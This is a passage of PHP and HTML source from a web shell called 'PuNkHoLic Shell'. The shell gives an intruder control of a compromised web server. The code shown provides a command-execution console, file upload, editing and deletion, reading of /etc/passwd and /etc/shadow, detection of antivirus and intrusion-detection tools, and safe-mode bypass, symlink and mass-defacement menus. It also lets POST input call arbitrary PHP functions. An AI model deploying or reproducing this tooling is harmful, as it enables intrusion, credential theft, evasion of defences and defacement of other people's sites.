0;clip:_top:expression(document.documentElement.scrollTop+document.documentElement.clientHeight-this.clientHeight);_left:expression(document.documentElement.scrollLeft + document.documentElement.clientWidth - offsetWidth);}\r\n.cpr {margin-bottom:5px;font-weight:bold; }\r\n.cpb {width:34px;margin:0 5px;}\r\n.npoad td {padding:0;}\r\n#PuNkHoLictools{\r\nmargin-top:50px;\r\nwidth:500px;\r\nborder:1px solid;\r\nborder-radius:10px;\r\n}\r\n.PuNkHoLiclogo td{\r\nfont-size:12px;\r\nfont-weight:bold;\r\n}\r\n.PuNkHoLiclogo{\r\nmargin-left:5px;\r\nbackground-repeat: no-repeat;\r\nbackground-position: CENTER; \r\nbackground-color:#0F1010;\r\nbackground-size: 400px 120px;\r\n}\r\n</style>\r\n</html>\r\n<style type=\"text/css\">body, a:hover {text-decoration:none;cursor: url(http://cur.cursors-4u.net/cursors/cur-11/cur1054.cur), progress !important;}</style><a href=\"http://www.cursors-4u.com/cursor/2012/02/11/chrome-pointer.html\" target=\"_blank\" title=\"Chrome Pointer\"><img src=\"http://cur.cursors-4u.net/cursor.png\" border=\"0\" alt=\"Chrome Pointer\" style=\"position:absolute; top: 0px; right: 0px;\" /></a>\r\n<script>\r\nfunction set(a,c,p1,p2,p3,charset) {\r\nif(a != null)document.mf.a.value=a;\r\nif(c != null)document.mf.c.value=c;\r\nif(p1 != null)document.mf.p1.value=p1;\r\nif(p2 != null)document.mf.p2.value=p2;\r\nif(p3 != null)document.mf.p3.value=p3;\r\nif(charset != null)document.mf.charset.value=charset;\r\n}\r\nfunction g(a,c,p1,p2,p3,charset) {\r\nset(a,c,p1,p2,p3,charset);\r\ndocument.mf.submit();\r\n}\r\nfunction a(a,c,p1,p2,p3,charset) {\r\nset(a,c,p1,p2,p3,charset);\r\nvar params = \"ajax=true\";\r\nfor(i=0;i<document.mf.elements.length;i++)\r\nparams += \"&\"+document.mf.elements[i].name+\"=\"+encodeURIComponent(document.mf.elements[i].value);\r\nsr(\"'.\$_SERVER['REQUEST_URI'].'\", params);\r\n}\r\nfunction sr(url, params) {\r\nif (window.XMLHttpRequest) {\r\nreq = new XMLHttpRequest();\r\nreq.onreadystatechange = processReqChange;\r\nreq.open(\"POST\", url, true);\r\nreq.setRequestHeader (\"Content-Type\", \"application/x-www-form-urlencoded\");\r\nreq.send(params);\r\n} \r\nelse if (window.ActiveXObject) {\r\nreq = new ActiveXObject(\"Microsoft.XMLHTTP\");\r\nif (req) {\r\nreq.onreadystatechange = processReqChange;\r\nreq.open(\"POST\", url, true);\r\nreq.setRequestHeader (\"Content-Type\", \"application/x-www-form-urlencoded\");\r\nreq.send(params);\r\n}\r\n}\r\n}\r\nfunction processReqChange() {\r\nif( (req.readyState == 4) )\r\nif(req.status == 200) {\r\n//alert(req.responseText);\r\nvar reg = new RegExp(\"(\\\\d+)([\\\\S\\\\s]*)\", \"m\");\r\nvar arr=reg.exec(req.responseText);\r\neval(arr[2].substr(0, arr[1]));\r\n} \r\nelse alert(\"Request error!\");\r\n}\r\n</script>\r\n<head><link href=\"https://fonts.googleapis.com/css?family=Audiowide\" ></head><body><div style=\"position:absolute;width:100%;top:0;left:0;\"><div style=\"margin:5px;background:black;\"><div class=\"content\" style=\"border:1px solid '.\$Theme.'; border-radius:5px;\">\r\n<form method=post name=mf style=\"display:none;\">\r\n<input type=hidden name=a value=\"'.(isset(\$_POST['a'])?\$_POST['a']:'').'\">\r\n<input type=hidden name=c value=\"'.htmlspecialchars(\$GLOBALS['cwd']).'\">\r\n<input type=hidden name=p1 value=\"'.(isset(\$_POST['p1'])?htmlspecialchars(\$_POST['p1']):'').'\">\r\n<input type=hidden name=p2 value=\"'.(isset(\$_POST['p2'])?htmlspecialchars(\$_POST['p2']):'').'\">\r\n<input type=hidden name=p3 value=\"'.(isset(\$_POST['p3'])?htmlspecialchars(\$_POST['p3']):'').'\">\r\n<input type=hidden name=charset value=\"'.(isset(\$_POST['charset'])?\$_POST['charset']:'').'\">\r\n</form>';\r\n\$freeSpace = @diskfreespace(\$GLOBALS['cwd']);\r\n\$totalSpace = @disk_total_space(\$GLOBALS['cwd']);\r\n\$totalSpace = \$totalSpace?\$totalSpace:1;\r\n\$disable_functions = @ini_get('disable_functions');\r\n\$release = @php_uname('r');\r\n\$kernel = @php_uname('s');\r\nif(!function_exists('posix_getegid')) {\r\n\$user = @get_current_user();\r\n\$uid = @getmyuid();\r\n\$gid = @getmygid();\r\n\$group = \"?\";\r\n} else {\r\n\$uid = @posix_getpwuid(@posix_geteuid());\r\n\$gid = @posix_getgrgid(@posix_getegid());\r\n\$user = \$uid['name'];\r\n\$uid = \$uid['uid'];\r\n\$group = \$gid['name'];\r\n\$gid = \$gid['gid'];\r\n}\r\n\$cwd_links = '';\r\n\$path = explode(\"/\", \$GLOBALS['cwd']);\r\n\$n=count(\$path);\r\nfor(\$i=0;\$i<\$n-1;\$i++) {\r\n\$cwd_links .= \"<a href='#' onclick='g(\\\"FilesMan\\\",\\\"\";\r\nfor(\$j=0;\$j<=\$i;\$j++)\r\n\$cwd_links .= \$path[\$j].'/';\r\n\$cwd_links .= \"\\\")'>\".\$path[\$i].\"/</a>\";\r\n}\r\n\$charsets = array('UTF-8', 'Windows-1251', 'KOI8-R', 'KOI8-U', 'cp866');\r\n\$opt_charsets = '';\r\nforeach(\$charsets as \$item)\r\n\$opt_charsets .= '<option value=\"'.\$item.'\" '.(\$_POST['charset']==\$item?'selected':'').'>'.\$item.'</option>';\r\n\$m = array('Import Scripts'=>'ImportScripts','Jumping'=>'Jumping','Symlink'=>'Symlink','Domains' => 'Domain','Shared Hostings'=>'Shared','Sym Sites'=>'Sym','Subdomain'=>'Subdomain','Sec. Info'=>'SecInfo','Files'=>'FilesMan','Console'=>'Console','Safe Mode'=>'Bypass','String tools'=>'StringTools','Defacer' => 'Deface','Recursive Defacer'=>'Defacer');\r\nif(!empty(\$GLOBALS['auth_pass']))\r\n\$m['Logout'] = 'Logout';\r\n\$menu = '';\r\nforeach(\$m as \$k => \$v)\r\n\$menu .= '<th><a href=\"#\" onclick=\"g(\\''.\$v.'\\',null,\\'\\',\\'\\',\\'\\')\">'.\$k.'</a></th>';\r\n\$drives = \"\";\r\nif (\$GLOBALS['os'] == 'win') {\r\nforeach( range('a','z') as \$drive ){\r\nif (is_dir(\$drive.':\\\\'))\r\n\$drives .= '<a href=\"#\" onclick=\"g(\\'FilesMan\\',\\''.\$drive.':/\\')\">[ '.\$drive.' ]</a> ';\r\n}\r\n\$drives .= '<br />: ';\r\n}\r\nif(\$GLOBALS['os'] == 'nix') {\r\n\$dominios = @file_get_contents(\"/etc/named.conf\");\r\nif(!\$dominios) {\r\n\$DomainS = \"/var/named\";\r\n\$Domainonserver = scandir(\$DomainS);\r\n\$d0c = count(\$Domainonserver);\r\n} else {\r\n@preg_match_all('/.*?zone \"(.*?)\" {/', \$dominios, \$out);\r\n\$out = sizeof(array_unique(\$out[1]));\r\n\$d0c = \$out.\"Domains\";\r\n}\r\n} else {\r\n\$d0c = \"Nothing here bro:(\";\r\n}\r\nif(\$GLOBALS['os'] == 'nix' )\r\n{\r\n\$usefl = ''; \$dwnldr = '';\r\nif(!@ini_get('safe_mode')) {\r\n\$temp = array();\r\n\$userful = array('gcc','lcc','cc','ld','make','php','perl','python','ruby','tar','gzip','bzip','bzip2','nc','locate','suidperl');\r\nforeach(\$userful as \$item) { if(which(\$item)) \$temp[]= \$item; }\r\n\$usefl = implode(', ',\$temp);\r\n\$temp = array();\r\n\$downloaders = array('wget','fetch','lynx','links','curl','get','lwp-mirror');\r\nforeach(\$downloaders as \$item2) { if(which(\$item2)) \$temp[]= \$item2; }\r\n\$dwnldr = implode(', ',\$temp);\r\n} else {\r\n\$usefl = ' ------- '; \$dwnldr = ' ------- ';\r\n}\r\n} else { \r\n\$usefl = ' ------- '; \$dwnldr = ' ------- ';\r\n} \r\necho '<div class=\"PuNkHoLiclogo\"><table class=\"info\" cellpadding=\"0\" cellspacing=\"0\" width=\"100%\"><tr>\r\n<td><table cellpadding=\"3\" cellspacing=\"0\" class=\"npoad\"><tr><td width=\"80px;\"><span>Uname</span></td><td>: <nobr>'.substr(@php_uname(), 0, 120).'</nobr></td></tr>\r\n<tr><td><span>User</span></td><td>: '.\$uid.' ( '.\$user.' ) <span>Group: </span> '.\$gid.' ( '.\$group.' )</td></tr><tr><td><span>Server</span></td><td>: '.@getenv('SERVER_SOFTWARE').'</td></tr><tr><td><span>Useful</span></td><td>: '.\$usefl.'</td></tr><tr><td><span>Downloaders</span></td><td>: '.\$dwnldr.'</td></tr><tr><td><span>D/functions</span></td><td>: '.(\$disable_functions?\$disable_functions:'All Function Enable').'</td></tr><tr><td><span>'.(\$GLOBALS['os'] == 'win'?'Drives<br />Cwd':'Cwd').'</span></td><td>: '.\$drives.''.\$cwd_links.' '.viewPermsColor(\$GLOBALS['cwd']).' <a href=# onclick=\"g(\\'FilesMan\\',\\''.\$GLOBALS['home_cwd'].'\\',\\'\\',\\'\\',\\'\\')\">[ home ]</a></td></tr></table></td>'.\r\n '<td width=4><nobr><span>Sv IP</span><br><span>Your IP</span><br /><span>HDD</span><br /><span>Free</span><br /><span>PHP</span><br /><span>Safe Mode</span><br /><span>Domains</span></nobr></td>'.\r\n '<td><nobr>: '.gethostbyname(\$_SERVER[\"HTTP_HOST\"]).'<br>: '.\$_SERVER['REMOTE_ADDR'].'<br />: '.viewSize(\$totalSpace).'<br />: '.viewSize(\$freeSpace).' ('.(int)(\$freeSpace/\$totalSpace*100).'%)<br>: '.@phpversion().' <a href=# onclick=\"g(\\'Php\\',null,null,\\'info\\')\">[ phpinfo ]</a><br />: '.(\$GLOBALS['safe_mode']?'<font color=red>ON</font>':'<font color='.\$color.'<b>OFF</b></font>').'<br />: '.\$d0c.'</nobr></td></tr></table></div>'.\r\n '</div></div><div style=\"margin:5;background:black;\"><div class=\"content\" style=\"border-top:5px solid 430303;padding:2px;\"><table cellpadding=\"3\" cellspacing=\"0\" width=\"100%\" class=\"menu\"><tr>'.\$menu.'</tr></table></div></div><div style=\"margin:5;background:black;\">';\r\n}\r\nfunction printFooter() {\r\n\$is_writable = is_writable(\$GLOBALS['cwd'])?\"<font color=green>[ Writeable ]</font>\":\"<font color=red>[ Not writable ]</font>\";\r\necho '</div><div style=\"margin:5px;background:black;\"><div class=\"content\" style=\"border:1px solid '.\$Theme.'; border-radius:5px;\">\r\n<table class=\"info\" id=\"toolsTbl\" cellpadding=\"3\" cellspacing=\"0\" width=\"100%\">\r\n<tr>\r\n<td><form onsubmit=\"g(null,this.c.value);return false;\"><span>Change dir:</span><br><input class=\"toolsInp\" type=text name=c value=\"'.htmlspecialchars(\$GLOBALS['cwd']).'\"><input type=submit value=\">>\"></form></td>\r\n<td><form onsubmit=\"g(\\'FilesTools\\',null,this.f.value);return false;\"><span>Read file:</span><br><input class=\"toolsInp\" type=text name=f><input type=submit value=\">>\"></form></td>\r\n</tr>\r\n<tr>\r\n<td><form onsubmit=\"g(\\'FilesMan\\',null,\\'mkdir\\',this.d.value);return false;\"><span>Make dir:</span><br><input class=\"toolsInp\" type=text name=d><input type=submit value=\">>\"></form>'.\$is_writable.'</td>\r\n<td><form onsubmit=\"g(\\'FilesTools\\',null,this.f.value,\\'mkfile\\');return false;\"><span>Make file:</span><br><input class=\"toolsInp\" type=text name=f><input type=submit value=\">>\"></form>'.\$is_writable.'</td>\r\n</tr>\r\n<tr>\r\n<td><form onsubmit=\"g(\\'Console\\',null,this.c.value);return false;\"><span>Execute:</span><br><input class=\"toolsInp\" type=text name=c value=\"\"><input type=submit value=\">>\"></form></td>\r\n<td><form method=\"post\" ENCTYPE=\"multipart/form-data\">\r\n<input type=hidden name=a value=\"FilesMAn\">\r\n<input type=hidden name=c value=\"'.htmlspecialchars(\$GLOBALS['cwd']).'\">\r\n<input type=hidden name=p1 value=\"uploadFile\">\r\n<input type=hidden name=charset value=\"'.(isset(\$_POST['charset'])?\$_POST['charset']:'').'\">\r\n<span>Upload file:</span><br><input class=\"toolsInp\" type=file name=f><input type=submit value=\">>\"></form>'.\$is_writable.'</td>\r\n</tr>\r\n</table></div></div>\r\n<div style=\"margin:5px;background:black;\"><div class=\"content\" style=\"border:2px solid '.\$Theme.';text-align:center;font-weight:bold; border-radius:10px;margin:auto; width:500;\">PuNkHoLic           Shell       coded by <a href=\"https://www.facebook.com/niraj.ghimire.5454\"> PuNkHoLic</a></div></div>\r\n</div>\r\n</body></html>';\r\n}\r\nif ( !function_exists(\"posix_getpwuid\") && (strpos(\$GLOBALS['disable_functions'], 'posix_getpwuid')===false) ) { function posix_getpwuid(\$p) { return false; } }\r\nif ( !function_exists(\"posix_getgrgid\") && (strpos(\$GLOBALS['disable_functions'], 'posix_getgrgid')===false) ) { function posix_getgrgid(\$p) { return false; } }\r\nfunction viewSize(\$s) {\r\nif(\$s >= 1073741824)\r\nreturn sprintf('%1.2f', \$s / 1073741824 ). ' GB';\r\nelseif(\$s >= 1048576)\r\nreturn sprintf('%1.2f', \$s / 1048576 ) . ' MB';\r\nelseif(\$s >= 1024)\r\nreturn sprintf('%1.2f', \$s / 1024 ) . ' KB';\r\nelse\r\nreturn \$s . ' B';\r\n}\r\nfunction perms(\$p) {\r\nif ((\$p & 0xC000) == 0xC000)\$i = 's';\r\nelseif ((\$p & 0xA000) == 0xA000)\$i = 'l';\r\nelseif ((\$p & 0x8000) == 0x8000)\$i = '-';\r\nelseif ((\$p & 0x6000) == 0x6000)\$i = 'b';\r\nelseif ((\$p & 0x4000) == 0x4000)\$i = 'd';\r\nelseif ((\$p & 0x2000) == 0x2000)\$i = 'c';\r\nelseif ((\$p & 0x1000) == 0x1000)\$i = 'p';\r\nelse \$i = 'u';\r\n\$i .= ((\$p & 0x0100) ? 'r' : '-');\r\n\$i .= ((\$p & 0x0080) ? 'w' : '-');\r\n\$i .= ((\$p & 0x0040) ? ((\$p & 0x0800) ? 's' : 'x' ) : ((\$p & 0x0800) ? 'S' : '-'));\r\n\$i .= ((\$p & 0x0020) ? 'r' : '-');\r\n\$i .= ((\$p & 0x0010) ? 'w' : '-');\r\n\$i .= ((\$p & 0x0008) ? ((\$p & 0x0400) ? 's' : 'x' ) : ((\$p & 0x0400) ? 'S' : '-'));\r\n\$i .= ((\$p & 0x0004) ? 'r' : '-');\r\n\$i .= ((\$p & 0x0002) ? 'w' : '-');\r\n\$i .= ((\$p & 0x0001) ? ((\$p & 0x0200) ? 't' : 'x' ) : ((\$p & 0x0200) ? 'T' : '-'));\r\nreturn \$i;\r\n}\r\nfunction viewPermsColor(\$f) { \r\nif (!@is_readable(\$f))\r\nreturn '<font color=#FF0000><b>'.perms(@fileperms(\$f)).'</b></font>';\r\nelseif (!@is_writable(\$f))\r\nreturn '<font color=white><b>'.perms(@fileperms(\$f)).'</b></font>';\r\nelse\r\nreturn '<font color=#00BB00><b>'.perms(@fileperms(\$f)).'</b></font>';\r\n}\r\nif(!function_exists(\"scandir\")) {\r\nfunction scandir(\$dir) {\r\n\$dh= opendir(\$dir);\r\nwhile (false !== (\$filename = readdir(\$dh))) {\r\n\$files[] = \$filename;\r\n}\r\nreturn \$files;\r\n}\r\n}\r\nfunction actionSecInfo() {\r\nprintHeader();\r\necho '<h1>Server security information</h1><div class=content>';\r\nfunction showSecParam(\$n, \$v) {\r\n\$v = trim(\$v);\r\nif(\$v) {\r\necho '<span>'.\$n.': </span>';\r\nif(strpos(\$v, \"\\n\") === false)\r\necho \$v.'<br>';\r\nelse\r\necho '<pre class=ml1>'.\$v.'</pre>';\r\n}\r\n}\r\nshowSecParam('Server software', @getenv('SERVER_SOFTWARE'));\r\nshowSecParam('Disabled PHP Functions', (\$GLOBALS['disable_functions'])?\$GLOBALS['disable_functions']:'none');\r\nshowSecParam('Open base dir', @ini_get('open_basedir'));\r\nshowSecParam('Safe mode exec dir', @ini_get('safe_mode_exec_dir'));\r\nshowSecParam('Safe mode include dir', @ini_get('safe_mode_include_dir'));\r\nshowSecParam('cURL support', function_exists('curl_version')?'enabled':'no');\r\n\$temp=array();\r\nif(function_exists('mysql_get_client_info'))\r\n\$temp[] = \"MySql (\".mysql_get_client_info().\")\";\r\nif(function_exists('mssql_connect'))\r\n\$temp[] = \"MSSQL\";\r\nif(function_exists('pg_connect'))\r\n\$temp[] = \"PostgreSQL\";\r\nif(function_exists('oci_connect'))\r\n\$temp[] = \"Oracle\";\r\nshowSecParam('Supported databases', implode(', ', \$temp));\r\necho '<br>';\r\nif( \$GLOBALS['os'] == 'nix' ) {\r\n\$userful = array('gcc','lcc','cc','ld','make','php','perl','python','ruby','tar','gzip','bzip','bzip2','nc','locate','suidperl');\r\n\$danger = array('kav','nod32','bdcored','uvscan','sav','drwebd','clamd','rkhunter','chkrootkit','iptables','ipfw','tripwire','shieldcc','portsentry','snort','ossec','lidsadm','tcplodg','sxid','logcheck','logwatch','sysmask','zmbscap','sawmill','wormscan','ninja');\r\n\$downloaders = array('wget','fetch','lynx','links','curl','get','lwp-mirror');\r\nshowSecParam('Readable /etc/passwd', @is_readable('/etc/passwd')?\"yes <a href='#' onclick='g(\\\"FilesTools\\\", \\\"/etc/\\\", \\\"passwd\\\")'>[view]</a>\":'no');\r\nshowSecParam('Readable /etc/shadow', @is_readable('/etc/shadow')?\"yes <a href='#' onclick='g(\\\"FilesTools\\\", \\\"etc\\\", \\\"shadow\\\")'>[view]</a>\":'no');\r\nshowSecParam('OS version', @file_get_contents('/proc/version'));\r\nshowSecParam('Distr name', @file_get_contents('/etc/issue.net'));\r\nif(!\$GLOBALS['safe_mode']) {\r\necho '<br>';\r\n\$temp=array();\r\nforeach (\$userful as \$item)\r\nif(which(\$item)){\$temp[]=\$item;}\r\nshowSecParam('Userful', implode(', ',\$temp));\r\n\$temp=array();\r\nforeach (\$danger as \$item)\r\nif(which(\$item)){\$temp[]=\$item;}\r\nshowSecParam('Danger', implode(', ',\$temp));\r\n\$temp=array();\r\nforeach (\$downloaders as \$item) \r\nif(which(\$item)){\$temp[]=\$item;}\r\nshowSecParam('Downloaders', implode(', ',\$temp));\r\necho '<br/>';\r\nshowSecParam('Hosts', @file_get_contents('/etc/hosts'));\r\nshowSecParam('HDD space', ex('df -h'));\r\nshowSecParam('Mount options', @file_get_contents('/etc/fstab'));\r\n}\r\n} else {\r\nshowSecParam('OS Version',ex('ver')); \r\nshowSecParam('Account Settings',ex('net accounts')); \r\nshowSecParam('User Accounts',ex('net user'));\r\n}\r\necho '</div>';\r\nprintFooter();\r\n}\r\nfunction actionFilesMan() {\r\nprintHeader();\r\necho '<h1>File manager</h1><div class=content>';\r\nif(isset(\$_POST['p1']) && \$_POST['p1']!='deface') {\r\nswitch(\$_POST['p1']) {\r\ncase 'uploadFile':\r\nif(!@move_uploaded_file(\$_FILES['f']['tmp_name'], \$_FILES['f']['name']))\r\necho \"Can't upload file!\";\r\nbreak;\r\nbreak;\r\ncase 'mkdir':\r\nif(!@mkdir(\$_POST['p2']))\r\necho \"Can't create new dir\";\r\nbreak;\r\ncase 'delete':\r\nfunction deleteDir(\$path) {\r\n\$path = (substr(\$path,-1)=='/') ? \$path:\$path.'/';\r\n\$dh= opendir(\$path);\r\nwhile ( (\$item = readdir(\$dh) ) !== false) {\r\n\$item = \$path.\$item;\r\nif ( (basename(\$item) == \"..\") || (basename(\$item) == \".\") )\r\ncontinue;\r\n\$type = filetype(\$item);\r\nif (\$type == \"dir\")\r\ndeleteDir(\$item);\r\nelse\r\n@unlink(\$item);\r\n}\r\nclosedir(\$dh);\r\nrmdir(\$path);\r\n}\r\nif(is_array(@\$_POST['f']))\r\nforeach(\$_POST['f'] as \$f) {\r\n\$f = urldecode(\$f);\r\nif(is_dir(\$f))\r\ndeleteDir(\$f);\r\nelse\r\n@unlink(\$f);\r\n}\r\nbreak;\r\ncase 'paste':\r\nif(\$_SESSION['act'] == 'copy') {\r\nfunction copy_paste(\$c,\$s,\$d){\r\nif(is_dir(\$c.\$s)){\r\nmkdir(\$d.\$s);\r\n\$h = opendir(\$c.\$s);\r\nwhile ((\$f = readdir(\$h)) !== false)\r\nif ((\$f != \".\") and (\$f != \"..\")) {\r\ncopy_paste(\$c.\$s.'/',\$f, \$d.\$s.'/');\r\n}\r\n} elseif(is_file(\$c.\$s)) {\r\n@copy(\$c.\$s, \$d.\$s);\r\n}\r\n}\r\nforeach(\$_SESSION['f'] as \$f)\r\ncopy_paste(\$_SESSION['cwd'],\$f, \$GLOBALS['cwd']);\r\n} elseif(\$_SESSION['act'] == 'move') {\r\nfunction move_paste(\$c,\$s,\$d){\r\nif(is_dir(\$c.\$s)){\r\nmkdir(\$d.\$s);\r\n\$h = opendir(\$c.\$s);\r\nwhile ((\$f = readdir(\$h)) !== false)\r\nif ((\$f != \".\") and (\$f != \"..\")) {\r\ncopy_paste(\$c.\$s.'/',\$f, \$d.\$s.'/');\r\n}\r\n} elseif(is_file(\$c.\$s)) {\r\n@copy(\$c.\$s, \$d.\$s);\r\n}\r\n}\r\nforeach(\$_SESSION['f'] as \$f)\r\n@rename(\$_SESSION['cwd'].\$f, \$GLOBALS['cwd'].\$f);\r\n}\r\nunset(\$_SESSION['f']);\r\nbreak;\r\ndefault:\r\nif(!empty(\$_POST['p1']) && ((\$_POST['p1'] == 'copy')||(\$_POST['p1'] == 'move')) ) {\r\n\$_SESSION['act'] = @\$_POST['p1'];\r\n\$_SESSION['f'] = @\$_POST['f'];\r\nforeach(\$_SESSION['f'] as \$k => \$f)\r\n\$_SESSION['f'][\$k] = urldecode(\$f);\r\n\$_SESSION['cwd'] = @\$_POST['c'];\r\n}\r\nbreak;\r\n}\r\necho '<script>document.mf.p1.value=\"\";document.mf.p2.value=\"\";</script>';\r\n}\r\n\$dirContent = @scandir(isset(\$_POST['c'])?\$_POST['c']:\$GLOBALS['cwd']);\r\nif(\$dirContent === false) {echo 'Can\\'t open this folder!'; return;}\r\nglobal \$sort;\r\n\$sort = array('name', 1);\r\nif(!empty(\$_POST['p1'])) {\r\nif(preg_match('!s_([A-z]+)_(\\d{1})!', \$_POST['p1'], \$match))\r\n\$sort = array(\$match[1], (int)\$match[2]);\r\n}\r\necho '<script>\r\nfunction sa() {\r\nfor(i=0;i<document.files.elements.length;i++)\r\nif(document.files.elements[i].type == \\'checkbox\\')\r\ndocument.files.elements[i].checked = document.files.elements[0].checked;\r\n}\r\n</script>\r\n<table width=\\'100%\\' class=\\'main\\' cellspacing=\\'0\\' cellpadding=\\'2\\'>\r\n<form name=files method=post>';\r\necho \"<tr><th width='13px'><input type=checkbox onclick='sa()' class=chkbx></th><th><a href='#' onclick='g(\\\"FilesMan\\\",null,\\\"s_name_\".(\$sort[1]?0:1).\"\\\")'>Name</a></th><th><a href='#' onclick='g(\\\"FilesMan\\\",null,\\\"s_size_\".(\$sort[1]?0:1).\"\\\")'>Size</a></th><th><a href='#' onclick='g(\\\"FilesMan\\\",null,\\\"s_modify_\".(\$sort[1]?0:1).\"\\\")'>Modify</a></th><th>Owner/Group</th><th><a href='#' onclick='g(\\\"FilesMan\\\",null,\\\"s_perms_\".(\$sort[1]?0:1).\"\\\")'>Permissions</a></th><th>Actions</th></tr>\";\r\n\$dirs = \$files = \$links = array();\r\n\$n = count(\$dirContent);\r\nfor(\$i=0;\$i<\$n;\$i++) {\r\n\$ow = @posix_getpwuid(@fileowner(\$dirContent[\$i]));\r\n\$gr = @posix_getgrgid(@filegroup(\$dirContent[\$i]));\r\n\$tmp = array('name' => \$dirContent[\$i],\r\n 'path' => \$GLOBALS['cwd'].\$dirContent[\$i],\r\n 'modify' => @date('Y-m-d H:i:s',@filemtime(\$GLOBALS['cwd'].\$dirContent[\$i])),\r\n 'perms' => viewPermsColor(\$GLOBALS['cwd'].\$dirContent[\$i]),\r\n 'size' => @filesize(\$GLOBALS['cwd'].\$dirContent[\$i]),\r\n 'owner' => \$ow['name']?\$ow['name']:@fileowner(\$dirContent[\$i]),\r\n 'group' => \$gr['name']?\$gr['name']:@filegroup(\$dirContent[\$i])\r\n);\r\nif(@is_file(\$GLOBALS['cwd'].\$dirContent[\$i]))\r\n\$files[] = array_merge(\$tmp, array('type' => 'file'));\r\nelseif(@is_link(\$GLOBALS['cwd'].\$dirContent[\$i]))\r\n\$links[] = array_merge(\$tmp, array('type' => 'link'));\r\nelseif(@is_dir(\$GLOBALS['cwd'].\$dirContent[\$i])&& (\$dirContent[\$i] != \".\"))\r\n\$dirs[] = array_merge(\$tmp, array('type' => 'dir'));\r\n}\r\n\$GLOBALS['sort'] = \$sort;\r\nfunction cmp(\$a, \$b) {\r\nif(\$GLOBALS['sort'][0] != 'size')\r\nreturn strcmp(\$a[\$GLOBALS['sort'][0]], \$b[\$GLOBALS['sort'][0]])*(\$GLOBALS['sort'][1]?1:-1);\r\nelse\r\nreturn ((\$a['size'] < \$b['size']) ? -1 : 1)*(\$GLOBALS['sort'][1]?1:-1);\r\n}\r\nusort(\$files, \"cmp\");\r\nusort(\$dirs, \"cmp\");\r\nusort(\$links, \"cmp\");\r\n\$files = array_merge(\$dirs, \$links, \$files);\r\n\$l = 0;\r\nforeach(\$files as \$f) {\r\necho '<tr'.(\$l?' class=l1':'').'><td><input type=checkbox name=\"f[]\" value=\"'.urlencode(\$f['name']).'\" class=chkbx></td><td><a href=# onclick=\"'.((\$f['type']=='file')?'g(\\'FilesTools\\',null,\\''.urlencode(\$f['name']).'\\', \\'view\\')\">'.htmlspecialchars(\$f['name']):'g(\\'FilesMan\\',\\''.\$f['path'].'\\');\"><b>[ '.htmlspecialchars(\$f['name']).' ]</b>').'</a></td><td>'.((\$f['type']=='file')?viewSize(\$f['size']):\$f['type']).'</td><td>'.\$f['modify'].'</td><td>'.\$f['owner'].'/'.\$f['group'].'</td><td><a href=# onclick=\"g(\\'FilesTools\\',null,\\''.urlencode(\$f['name']).'\\',\\'chmod\\')\">'.\$f['perms']\r\n.'</td><td><a href=\"#\" onclick=\"g(\\'FilesTools\\',null,\\''.urlencode(\$f['name']).'\\', \\'rename\\')\">R</a> <a href=\"#\" onclick=\"g(\\'FilesTools\\',null,\\''.urlencode(\$f['name']).'\\', \\'touch\\')\">T</a>'.((\$f['type']=='file')?' <a href=\"#\" onclick=\"g(\\'FilesTools\\',null,\\''.urlencode(\$f['name']).'\\', \\'edit\\')\">E</a> <a href=\"#\" onclick=\"g(\\'FilesTools\\',null,\\''.urlencode(\$f['name']).'\\', \\'download\\')\">D</a>':'').'</td></tr>';\r\n\$l = \$l?0:1;\r\n}\r\necho '<tr><td colspan=5>\r\n<input type=hidden name=a value=\\'FilesMan\\'>\r\n<input type=hidden name=c value=\"'.htmlspecialchars(\$GLOBALS['cwd']).'\">\r\n<input type=hidden name=charset value=\"'.(isset(\$_POST['charset'])?\$_POST['charset']:'').'\">\r\n<select name=\\'p1\\'><option value=\\'copy\\'>Copy</option><option value=\\'move\\'>Move</option><option value=\\'delete\\'>Delete</option>';\r\nif(!empty(\$_SESSION['act'])&&@count(\$_SESSION['f'])){echo '<option value=\\'paste\\'>Paste</option>'; }\r\necho '</select>&nbsp;<input type=\"submit\" value=\">>\"></td><td colspan=\"2\" align=\"right\" width=\"1\"><input name=\"def\" id=\"def\" value=\"index.php\" size=\"10\"/>&nbsp;<input type=\"button\" onclick=\"g(\\'FilesMan\\',\\''.htmlspecialchars(\$GLOBALS['cwd']).'\\',\\'deface\\',document.getElementById(\\'def\\').value)\" value=\"Add your Deface\"></td></tr>\r\n</form></table></div>';\r\nprintFooter();\r\n}\r\nfunction actionStringTools() {\r\nif(!function_exists('hex2bin')) {function hex2bin(\$p) {return decbin(hexdec(\$p));}}\r\nif(!function_exists('hex2ascii')) {function hex2ascii(\$p){\$r='';for(\$i=0;\$i<strLen(\$p);\$i+=2){\$r.=chr(hexdec(\$p[\$i].\$p[\$i+1]));}return \$r;}}\r\nif(!function_exists('ascii2hex')) {function ascii2hex(\$p){\$r='';for(\$i=0;\$i<strlen(\$p);++\$i)\$r.= dechex(ord(\$p[\$i]));return strtoupper(\$r);}}\r\nif(!function_exists('full_urlencode')) {function full_urlencode(\$p){\$r='';for(\$i=0;\$i<strlen(\$p);++\$i)\$r.= '%'.dechex(ord(\$p[\$i]));return strtoupper(\$r);}}\r\nif(isset(\$_POST['ajax'])) {\r\n\$_SESSION[md5(\$_SERVER['HTTP_HOST']).'ajax'] = true;\r\nob_start();\r\nif(function_exists(\$_POST['p1']))\r\necho \$_POST['p1'](\$_POST['p2']);\r\n\$temp = \"document.getElementById('strOutput').style.display='';document.getElementById('strOutput').innerHTML='\".addcslashes(htmlspecialchars(ob_get_clean()),\"\\n\\r\\t\\\\'\\0\").\"';\\n\";\r\necho strlen(\$temp), \"\\n\", \$temp;\r\nexit;\r\n}\r\nprintHeader();\r\necho '<h1>String conversions</h1><div class=content>';\r\n\$stringTools = array(\r\n'Base64 encode' => 'base64_encode',\r\n'Base64 decode' => 'base64_decode',\r\n'Url encode' => 'urlencode',\r\n'Url decode' => 'urldecode',\r\n'Full urlencode' => 'full_urlencode',\r\n'md5 hash' => 'md5',\r\n'sha1 hash' => 'sha1',\r\n'crypt' => 'crypt',\r\n'CRC32' => 'crc32',\r\n'ASCII to HEX' => 'ascii2hex',\r\n'HEX to ASCII' => 'hex2ascii',\r\n'HEX to DEC' => 'hexdec',\r\n'HEX to BIN' => 'hex2bin',\r\n'DEC to HEX' => 'dechex',\r\n'DEC to BIN' => 'decbin',\r\n'BIN to HEX' => 'bin2hex',\r\n'BIN to DEC' => 'bindec',\r\n'String to lower case' => 'strtolower',\r\n'String to upper case' => 'strtoupper',\r\n'Htmlspecialchars' => 'htmlspecialchars',\r\n'String length' => 